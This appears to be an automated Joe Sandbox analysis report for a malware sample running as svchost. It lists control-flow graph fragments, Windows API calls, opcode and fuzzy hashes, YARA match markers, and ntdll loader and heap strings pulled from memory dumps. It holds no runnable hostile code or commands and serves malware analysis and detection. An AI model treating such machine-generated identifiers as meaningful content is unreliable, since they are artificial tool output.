                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd
                                          • API String ID: 1836367815-2140840037
                                          • Opcode ID: d1ce65ee99baeeff285e5ab2b308634cef606b1e228db8cb64088192602b74fa
                                          • Instruction ID: 8577b45de724b45c6a442faf0f86e2058518f9fb1884a09e8d4ffd2d1505b06e
                                          • Opcode Fuzzy Hash: d1ce65ee99baeeff285e5ab2b308634cef606b1e228db8cb64088192602b74fa
                                          • Instruction Fuzzy Hash: 16010CB1D0015CBAEB11AAE1DC81DEF7B7CDF41394F00406AFA0467202E6794E464BB5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 78 42c463-42c4a4 call 404783 call 42d363 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,A0F52DE5,00000007,00000000,00000004,00000000,00416AF9,000000F4), ref: 0042C49F
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 9d6b6e8f6847e82904c7d978e879e3a85c0fcb5c4f7c0134554bb6c8ddfafde6
                                          • Instruction ID: 3e5b83701a0619aee715de283415b966ebc4b10f46454db6a7e9f0f0a1907582
                                          • Opcode Fuzzy Hash: 9d6b6e8f6847e82904c7d978e879e3a85c0fcb5c4f7c0134554bb6c8ddfafde6
                                          • Instruction Fuzzy Hash: 71E06D712042047BC614EE59DC41F9B37ACEFC9714F000019FE18A7241C670B91087B9

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 73 42c413-42c457 call 404783 call 42d363 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,0041E05E,?,?,00000000,?,0041E05E,?,?,?), ref: 0042C452
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: c9e54603b4f54ebcb22d8f0863311e59ec884a1d81b183e57f98aee58c681ad4
                                          • Instruction ID: 4203673ef09efe41aa39daa9bc5d7d39d72a13cfc4178b2adf3e21d945a7806e
                                          • Opcode Fuzzy Hash: c9e54603b4f54ebcb22d8f0863311e59ec884a1d81b183e57f98aee58c681ad4
                                          • Instruction Fuzzy Hash: E5E06D716002147BC610EE59EC41F9B37ACEFC5B10F404419FE58AB242C671B91087B9

Control-flow Graph (graph image not reproduced; executed / not-executed colouring lost)
• control_flow_graph 88 42c4b3-42c4ef call 404783 call 42d363 ExitProcess
                                          APIs
                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,C86F0502,?,?,C86F0502), ref: 0042C4EA
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: d5cb3f6058f9be6b149dfd53384264be60094e4cbbfe259bbee28147f61b8151
                                          • Instruction ID: 64836b3dcdb75f89750afefb308aee4408def90b62afbd9de15a3f80c8f9bf60
                                          • Opcode Fuzzy Hash: d5cb3f6058f9be6b149dfd53384264be60094e4cbbfe259bbee28147f61b8151
                                          • Instruction Fuzzy Hash: 90E04F322002147BD610EA9ADC41FAB776CDFC5714F144019FE58A7182C675790087F5

Control-flow Graph (graph image not reproduced; executed / not-executed colouring lost)
• control_flow_graph 93 3672c0a-3672c0f 94 3672c11-3672c18 93->94 95 3672c1f-3672c26 LdrInitializeThunk 93->95
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                          • Instruction ID: 8879c64833d99df56973c153897a30f1d1648756cce15cdd82e5853e14c7e5b8
                                          • Opcode Fuzzy Hash: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                          • Instruction Fuzzy Hash: B4B09B719015C5C5DA51F7604708717790567D1701F59C561D3030755F4779C1D1E175
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: 37b12cec14bd1b1e05cd17cd46f08cae87ef28e74e10486562a68b379ed6b726
                                          • Instruction ID: 579dbb5c965ea333aca3dc55a386f555582a637ebc135a81a8874d41969481f9
                                          • Opcode Fuzzy Hash: 37b12cec14bd1b1e05cd17cd46f08cae87ef28e74e10486562a68b379ed6b726
                                          • Instruction Fuzzy Hash: 56929975608341ABD720DE24C890BABB7F8BB88754F184D2DFA949B350D770E885CF96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-3089669407
                                          • Opcode ID: 460f89aef6cec8c33ae17b34ddeb96396b67d5c8f14a3744fd1f13cb21fb8456
                                          • Instruction ID: fe5cc9c18bd150f53253cd5fdb831e2684913840c2a20cfe30ccc87c1fa21018
                                          • Opcode Fuzzy Hash: 460f89aef6cec8c33ae17b34ddeb96396b67d5c8f14a3744fd1f13cb21fb8456
                                          • Instruction Fuzzy Hash: 168122B2D01618AF8B22FB98DDC5DEFB7FDAB15610B054525FA01FB104E724ED148BA0
                                          Strings
                                          • Address of the debug info found in the active list., xrefs: 036A54AE, 036A54FA
                                          • Thread identifier, xrefs: 036A553A
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54E2
                                          • 8, xrefs: 036A52E3
                                          • double initialized or corrupted critical section, xrefs: 036A5508
                                          • undeleted critical section in freed memory, xrefs: 036A542B
                                          • Critical section debug info address, xrefs: 036A541F, 036A552E
                                          • Invalid debug info address of this critical section, xrefs: 036A54B6
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 036A5543
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A540A, 036A5496, 036A5519
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54CE
                                          • Critical section address, xrefs: 036A5425, 036A54BC, 036A5534
                                          • corrupted critical section, xrefs: 036A54C2
                                          • Critical section address., xrefs: 036A5502
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: 901b5db5c862ce80c417aeb69ce44e4ca8714589b9262d274409f882408629be
                                          • Instruction ID: 45aac73e284e222e6b6ce09a7945f23b09bfe3a2b8026c3149431584cb2a7b77
                                          • Opcode Fuzzy Hash: 901b5db5c862ce80c417aeb69ce44e4ca8714589b9262d274409f882408629be
                                          • Instruction Fuzzy Hash: E6819DB0A00758EFDB20CF98C941BAEBBB9FB49710F184159F659BB241D375A941CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                          • API String ID: 0-360209818
                                          • Opcode ID: 179af670409d6ee83614192e47aa7ff7d291949fba0f0d6c72591bd193f3ff25
                                          • Instruction ID: e17fecd882923972afb8290998e97f09edcb071017f5b709de10eee5121f10f8
                                          • Opcode Fuzzy Hash: 179af670409d6ee83614192e47aa7ff7d291949fba0f0d6c72591bd193f3ff25
                                          • Instruction Fuzzy Hash: 06628FB5E006298FDB24CF18C9417A9B7B6EF96310F5882DAD449AB340D7729EE1CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                          • API String ID: 0-3591852110
                                          • Opcode ID: c649eca0ecb7d5d24c71e40f20c9db7ea8caae3da64fca9e55583e340940f5c1
                                          • Instruction ID: c7e5ab7149c905e8582025eb4fa73cd6962cf932f39ae9c2765d505d8e99d2cb
                                          • Opcode Fuzzy Hash: c649eca0ecb7d5d24c71e40f20c9db7ea8caae3da64fca9e55583e340940f5c1
                                          • Instruction Fuzzy Hash: C012CC74601642DFCB25CF28C545BBABBF5FF0A704F188459E4968B782D734E889EB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-3197712848
                                          • Opcode ID: 1ac064034c0d2c80aa3e91ff19a6cd1f59df3e96e3de8cb2fb1390c52900c032
                                          • Instruction ID: 795c46e2df0cc8f555d5d447516d9f282f181ef251fdc5b1e61611109ce8c171
                                          • Opcode Fuzzy Hash: 1ac064034c0d2c80aa3e91ff19a6cd1f59df3e96e3de8cb2fb1390c52900c032
                                          • Instruction Fuzzy Hash: 4512FE71A083419FD724DF68C940BAAB7E8BF85B04F08496EF8C58B381E774D945CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                          • API String ID: 0-3532704233
                                          • Opcode ID: 2fa499dab1739731274f3664558fec01f46db9498b3d81da4fb0a6d67204d1bb
                                          • Instruction ID: 3889651b34ef4b7b7e461938dcb844dcc8261e10efd52513ff04f19d353db04f
                                          • Opcode Fuzzy Hash: 2fa499dab1739731274f3664558fec01f46db9498b3d81da4fb0a6d67204d1bb
                                          • Instruction Fuzzy Hash: A9B1BD715087619FC721EF64C580A6BBBE8AF88744F06492EF899E7340D770D949CFA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                          • API String ID: 0-1357697941
                                          • Opcode ID: 103acd7d7ec564acf7d07e89c136e36fe58558bf3d77339d6da66afacafab9e4
                                          • Instruction ID: f9960eacd882f8698372767dc80e4e0f065a5b28fd14e252291b0af2dddba3c6
                                          • Opcode Fuzzy Hash: 103acd7d7ec564acf7d07e89c136e36fe58558bf3d77339d6da66afacafab9e4
                                          • Instruction Fuzzy Hash: 2BF11435A05655EFCB25CF6AC440BAAFBF5FF0A704F088059E4929B382C7B4A949DF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                          • API String ID: 0-3063724069
                                          • Opcode ID: 7a9e26e6a5c68c2af10545e8cdc4c39cac6eb79fe9788ca00ff0ba153189ebfc
                                          • Instruction ID: 61ce727a3c23c3f364e3a98415374876f01d044730021300aec43b057caf5ffa
                                          • Opcode Fuzzy Hash: 7a9e26e6a5c68c2af10545e8cdc4c39cac6eb79fe9788ca00ff0ba153189ebfc
                                          • Instruction Fuzzy Hash: 79D1E372814395AFE721DB64C840BBFBBE8EF84714F48492DFA849B250D770D914CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: f2a5523afdce4ce977b8cd870b31103a34b0afbc92692948a2e92e7ef25879c5
                                          • Instruction ID: f0164e6b87c13e6c750d619c1bac27a5e9d3dd3b5db1fc0d2d676a67cefd902a
                                          • Opcode Fuzzy Hash: f2a5523afdce4ce977b8cd870b31103a34b0afbc92692948a2e92e7ef25879c5
                                          • Instruction Fuzzy Hash: A2D1DC39A01A81DFCB22DF6AC540AAEBBF1FF4A710F198049E4559F352C7B49949CF18
                                          Strings
                                          • @, xrefs: 0362D0FD
                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0362D0CF
                                          • @, xrefs: 0362D2AF
                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0362D146
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0362D2C3
                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0362D262
                                          • @, xrefs: 0362D313
                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 0362D196
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                          • API String ID: 0-1356375266
                                          • Opcode ID: 72e69bebd7e70c3fd46cb39334945dfd6b6de61d69092ec852a43d40fe452e05
                                          • Instruction ID: cb85851827e826fcad21753db50097ac4547b48c8a4419d4333d8fff569c9925
                                          • Opcode Fuzzy Hash: 72e69bebd7e70c3fd46cb39334945dfd6b6de61d69092ec852a43d40fe452e05
                                          • Instruction Fuzzy Hash: CFA1BD719087159FD321DF20C584BABBBE8BB88715F014D2EFAA896240E774D908CF97
                                          Strings
                                          • minkernel\ntdll\sxsisol.cpp, xrefs: 03697713, 036978A4
                                          • Internal error check failed, xrefs: 03697718, 036978A9
                                          • Status != STATUS_NOT_FOUND, xrefs: 0369789A
                                          • @, xrefs: 03649EE7
                                          • sxsisol_SearchActCtxForDllName, xrefs: 036976DD
                                          • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 036976EE
                                          • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03697709
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                          • API String ID: 0-761764676
                                          • Opcode ID: 9821035e8a453014ece937f37ce2b2cfc807442c344fa801961c18b93b8bfb36
                                          • Instruction ID: ce9a9625f476e71c852b35efcb2517c31bb16415e025f6bd00a69f6157030bd8
                                          • Opcode Fuzzy Hash: 9821035e8a453014ece937f37ce2b2cfc807442c344fa801961c18b93b8bfb36
                                          • Instruction Fuzzy Hash: 8D127E74E00215DBDF24CFA8C981AAEB7F8FF49714F1884AAE845EB341E7349851CB65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                          • API String ID: 0-1109411897
                                          • Opcode ID: ada50179064d68e9e76df560ba570b3cc2044666056b4715a352dcda5ff2da1e
                                          • Instruction ID: a645f34ba35d29ffbd308ebaab3d8fc28a150dd271f91b5ccc4638435b5d80d1
                                          • Opcode Fuzzy Hash: ada50179064d68e9e76df560ba570b3cc2044666056b4715a352dcda5ff2da1e
                                          • Instruction Fuzzy Hash: 8FA23875E056298BDF65CF19CD887A9B7B9AF46304F1442EAD80DAB350DB319E82CF10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 72a5aef6ef6444e9595da745d8e539337873a800b6722f11a1ecf024c2a3e55f
                                          • Instruction ID: 322ca20196072f33bce53155b931c741b8985e9b5cbddc862d19e15b93ee4729
                                          • Opcode Fuzzy Hash: 72a5aef6ef6444e9595da745d8e539337873a800b6722f11a1ecf024c2a3e55f
                                          • Instruction Fuzzy Hash: C742FE75608B919FC714EF28C590A2AFBE5FF89204F094A6DE8868F381D730D842CF56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                          • API String ID: 0-4098886588
                                          • Opcode ID: ba60c781db9624c796876b0880fc3e603f99dfd227fa986c71e2263b01d80aef
                                          • Instruction ID: ad6ac6569fc788e4d372939171c662bfd6d1268261e2ddd578ef8a0af49df29f
                                          • Opcode Fuzzy Hash: ba60c781db9624c796876b0880fc3e603f99dfd227fa986c71e2263b01d80aef
                                          • Instruction Fuzzy Hash: B432A175E042698BEF22CF14CD94BEEBBB9AF46340F1841EAE449A7350D7719E818F44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-122214566
                                          • Opcode ID: 8b98c884ee7763cdcea8c0fa9e12bbbeac5b2a7a574e0a433387637bb75a6b34
                                          • Instruction ID: 61a59e040741913a494003336e544fdeb4c8de8bb2103f00a1675c65baf34e3b
                                          • Opcode Fuzzy Hash: 8b98c884ee7763cdcea8c0fa9e12bbbeac5b2a7a574e0a433387637bb75a6b34
                                          • Instruction Fuzzy Hash: E0C14B31E00215ABDF25CF69C881BBFBB69AF46710F184069E8869F381E7B4DD45C7A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 4c1d2e7a04ecdc933ddece91727a85b4a9a4d1d6c9c034d6b9cce3b8d80b486e
                                          • Instruction ID: b68c1c0c0f3db365c919d15d3854d37e81bf53d2ce74437a05d76ae26da3ccad
                                          • Opcode Fuzzy Hash: 4c1d2e7a04ecdc933ddece91727a85b4a9a4d1d6c9c034d6b9cce3b8d80b486e
                                          • Instruction Fuzzy Hash: 73915A30B007149BDB35EF19ED95BAEBBA4EF41764F18812DE4106B381DBB45C01CBA4
                                          Strings
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 036A2180
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 036A2178
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 036A219F
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 036A21BF
                                          • RtlGetAssemblyStorageRoot, xrefs: 036A2160, 036A219A, 036A21BA
                                          • SXS: %s() passed the empty activation context, xrefs: 036A2165
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 027ae63fec5a9fd33bf3da33435b057ce54c82c6edc4417136aa55880b35f0c9
                                          • Instruction ID: e1286b9a273467c86b25e2f7ae68a3f042581395811c0b9c48785418b40d85a3
                                          • Opcode Fuzzy Hash: 027ae63fec5a9fd33bf3da33435b057ce54c82c6edc4417136aa55880b35f0c9
                                          • Instruction Fuzzy Hash: AD312836F802147BE721CA998C65F5FBF78DB95A80F094469FA14AB241D670DE01CBE1
                                          Strings
                                          • LdrpInitializeImportRedirection, xrefs: 036A8177, 036A81EB
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 036A8181, 036A81F5
                                          • minkernel\ntdll\ldrinit.c, xrefs: 0366C6C3
                                          • LdrpInitializeProcess, xrefs: 0366C6C4
                                          • Loading import redirection DLL: '%wZ', xrefs: 036A8170
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 036A81E5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 7c478064954e2fd938fb7687bcf39ede4813842984e735763f085e740b15f587
                                          • Instruction ID: db67810cf4b8358810ca9bed863b29687789e513dc508bfa31e1f72894f933af
                                          • Opcode Fuzzy Hash: 7c478064954e2fd938fb7687bcf39ede4813842984e735763f085e740b15f587
                                          • Instruction Fuzzy Hash: AC310775744B459FD224EF28DD45E2ABBE4EF84B10F04056CF885AF391E660EC04CBA6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                          • API String ID: 0-3127649145
                                          • Opcode ID: f7528f36ef7996882a49b42605aec02799ccd89ba4be9cfd92f541c982d7d6a3
                                          • Instruction ID: 079f7b02c40717dd82f2f37a86bfded669839cbded2cc0aa82200cc3b98ade23
                                          • Opcode Fuzzy Hash: f7528f36ef7996882a49b42605aec02799ccd89ba4be9cfd92f541c982d7d6a3
